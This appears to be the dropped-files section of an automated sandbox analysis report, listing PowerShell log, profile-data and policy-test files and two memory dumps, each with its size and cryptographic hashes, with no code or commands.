                                                                        Replay Monitor

                                                                        Loading Replay Monitor...

                                                                        Downloads

                                                                        • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

                                                                          Filesize

                                                                          2KB

                                                                          MD5

                                                                          d85ba6ff808d9e5444a4b369f5bc2730

                                                                          SHA1

                                                                          31aa9d96590fff6981b315e0b391b575e4c0804a

                                                                          SHA256

                                                                          84739c608a73509419748e4e20e6cc4e1846056c3fe1929a8300d5a1a488202f

                                                                          SHA512

                                                                          8c414eb55b45212af385accc16d9d562adba2123583ce70d22b91161fe878683845512a78f04dedd4ea98ed9b174dbfa98cf696370598ad8e6fbd1e714f1f249

                                                                        • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                                          Filesize

                                                                          1KB

                                                                          MD5

                                                                          cb5a7c84bb571c13878f3f50797f79cb

                                                                          SHA1

                                                                          c42cf59af6b34ba84dbce8eb9d8760563473aa34

                                                                          SHA256

                                                                          9a18c090421b64d07e3fdbc3e61beb26e8e827b8f5cd42cb6a7a3dd08fb3b947

                                                                          SHA512

                                                                          646bbb5968ac16f975d67f630f7b47fe82779b6c9c9a472e1a40df294862fc60adc5d5cc12b01f34839ba1cd6ec15fc983c42a050e879346a4b683f1354b030b

                                                                        • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                                          Filesize

                                                                          944B

                                                                          MD5

                                                                          a8e8360d573a4ff072dcc6f09d992c88

                                                                          SHA1

                                                                          3446774433ceaf0b400073914facab11b98b6807

                                                                          SHA256

                                                                          bf5e284e8f95122bf75ead61c7e2b40f55c96742b05330b5b1cb7915991df13b

                                                                          SHA512

                                                                          4ee5167643d82082f57c42616007ef9be57f43f9731921bdf7bca611a914724ad94072d3c8f5b130fa54129e5328ccdebf37ba74339c37deb53e79df5cdf0dbe

                                                                        • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                                          Filesize

                                                                          944B

                                                                          MD5

                                                                          6d3e9c29fe44e90aae6ed30ccf799ca8

                                                                          SHA1

                                                                          c7974ef72264bbdf13a2793ccf1aed11bc565dce

                                                                          SHA256

                                                                          2360634e63e8f0b5748e2c56ebb8f4aa78e71008ea7b5c9ca1c49be03b49557d

                                                                          SHA512

                                                                          60c38c4367352537545d859f64b9c5cbada94240478d1d039fd27b5ecba4dc1c90051557c16d802269703b873546ead416279c0a80c6fd5e49ad361cef22596a

                                                                        • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                                          Filesize

                                                                          1KB

                                                                          MD5

                                                                          c20ac38ae3022e305b8752804aadf486

                                                                          SHA1

                                                                          4c144d6cfafb5c37ab4810ff3c1744df81493cdb

                                                                          SHA256

                                                                          03cba7e903a418a3966af1dc0debfb5fcfb2ac6d372ec48cb1b93c23e0fd1caf

                                                                          SHA512

                                                                          c9def9e5cd09d19b8b47a3f4c61893da715a6ba4b9933c885386d0425ee4ccc30d75eac1097511619d4e6259a46581f803fb38f78a15339391e4e78b0b6153e0

                                                                        • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                                          Filesize

                                                                          663B

                                                                          MD5

                                                                          a8614a193d22a902e98728b2058ef931

                                                                          SHA1

                                                                          b6cff2d21c7199c435a75eb81925d81e9950a6c2

                                                                          SHA256

                                                                          dc525881a4bde1bdd97d5f86d6d9b7e280433dac86a7cb372561e21567935a14

                                                                          SHA512

                                                                          bdc1c190a230eb04e9e7f5474cf055e2b62fc7c671b1b5bd27f0c55aeffc064e0e48c9428ad85608b2420e12646b4388ff5337826413af1ffc32e9d036418f33

                                                                        • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                                          Filesize

                                                                          796B

                                                                          MD5

                                                                          7f8b53a986035930ca6cbedf83241248

                                                                          SHA1

                                                                          b922174446409d908e1daed6a06eb919230f92c7

                                                                          SHA256

                                                                          64be5a826411a6be75d1fb63a60c8e38634a31f4a8e3c6914ccc8dd1c9b7777c

                                                                          SHA512

                                                                          46c32bf34e1d06caade3357591bd62e7e707f1d26b0b8f4da18c8e1d2f84459e4467b70d24c93fb06a31800167101dd31c44c320d94f251dd1131e0598d13cc5

                                                                        • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                                          Filesize

                                                                          1KB

                                                                          MD5

                                                                          055cd1930e45c3d77aa744d53bcc29d9

                                                                          SHA1

                                                                          af1464daf329f36930b71fb33119c61a13472b6d

                                                                          SHA256

                                                                          fcd4a469c653f6bd319b201326633c2183a70184bc159c071915a9c4abd92d3c

                                                                          SHA512

                                                                          00ee038f281f34c7d727b7d6d7734bdfc61ee742b33edc5f905adae6afa949b9a9da8c575d949e98b24b59005e469628e99f113e0fc612dc24bbba7f098fa65d

                                                                        • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                                          Filesize

                                                                          1KB

                                                                          MD5

                                                                          98ca3263bd17f6f4308b8e4ff7530958

                                                                          SHA1

                                                                          6f41bacd42af6a11bb8d1516f7b07171087e7a17

                                                                          SHA256

                                                                          d25dfa289ae0981cb5c6da04de6c9f1a4aaf51ba8eafb7aeda3c9e5a27268e19

                                                                          SHA512

                                                                          f2ad36f84956741c2e3ef494a36f2a96bf944ab035419e82447bb25a53b309a9e93b450d679cb5709f6acb5a2b7956c568b280151b65313637f758ffd08f01e7

                                                                        • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                                          Filesize

                                                                          1KB

                                                                          MD5

                                                                          08f9f3eb63ff567d1ee2a25e9bbf18f0

                                                                          SHA1

                                                                          6bf06056d1bb14c183490caf950e29ac9d73643a

                                                                          SHA256

                                                                          82147660dc8d3259f87906470e055ae572c1681201f74989b08789298511e5f0

                                                                          SHA512

                                                                          425a4a8babbc11664d9bac3232b42c45ce8430b3f0b2ae3d9c8e12ad665cd4b4cbae98280084ee77cf463b852309d02ca43e5742a46c842c6b00431fc047d512

                                                                        • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                                          Filesize

                                                                          1KB

                                                                          MD5

                                                                          ba7bb8c22d72f7d6094bf4b7a11fd2df

                                                                          SHA1

                                                                          e68eab39081c17997a16bca1667f1544f11804a5

                                                                          SHA256

                                                                          0b479a9a243e4fa548d64277229f3c72cc7c6773001a235fc406c74e98d32b1a

                                                                          SHA512

                                                                          58288cb73c35eb08b28f9ad0e96ed17e89b6e361c015c233deba9eb39a928e7216576c897bed531625171606ff9952361c40b14df27c0aa7e2e68228aeb0de4c

                                                                        • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                                          Filesize

                                                                          1KB

                                                                          MD5

                                                                          b6b62fabc50bfae977635bcebb14c566

                                                                          SHA1

                                                                          653628f0db5229d9136ee897e92bedba3b1d91aa

                                                                          SHA256

                                                                          bd5e81d2c243ab6465ad978a5124f723b6518c08d63e4ebb386a564ebf3384be

                                                                          SHA512

                                                                          9bbbbdd9b0571e55065751e2100b21685ef630641bedf53e6a1c8b3ec96606c378ec53d732500e7dc17ae6e3a1b4d37f2fdbec8e493f6bdf10e4b829dad5962f

                                                                        • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                                          Filesize

                                                                          400B

                                                                          MD5

                                                                          2395435030954e996dda30cc02daebdd

                                                                          SHA1

                                                                          6d4493185988373c6dc2411fea8bad6c9648fd4a

                                                                          SHA256

                                                                          43e896907237944324de346cbc605dbc508f7a2c107c7f888f919e2d5cd046bc

                                                                          SHA512

                                                                          f20d578d95805ef321a32230d6b249db0dd9261f4937e4dcf9706430d55d1b4088aa7fc9cc9878932b3f7a99b8afac30368c6002e348a1d1a25b4375572044fb

                                                                        • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_nkvnhyod.u4n.ps1

                                                                          Filesize

                                                                          60B

                                                                          MD5

                                                                          d17fe0a3f47be24a6453e9ef58c94641

                                                                          SHA1

                                                                          6ab83620379fc69f80c0242105ddffd7d98d5d9d

                                                                          SHA256

                                                                          96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

                                                                          SHA512

                                                                          5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

                                                                        • memory/5008-11-0x000001B5EFB20000-0x000001B5EFB42000-memory.dmp

                                                                          Filesize

                                                                          136KB

                                                                        • memory/5296-156-0x00000196C9680000-0x00000196C969C000-memory.dmp

                                                                          Filesize

                                                                          112KB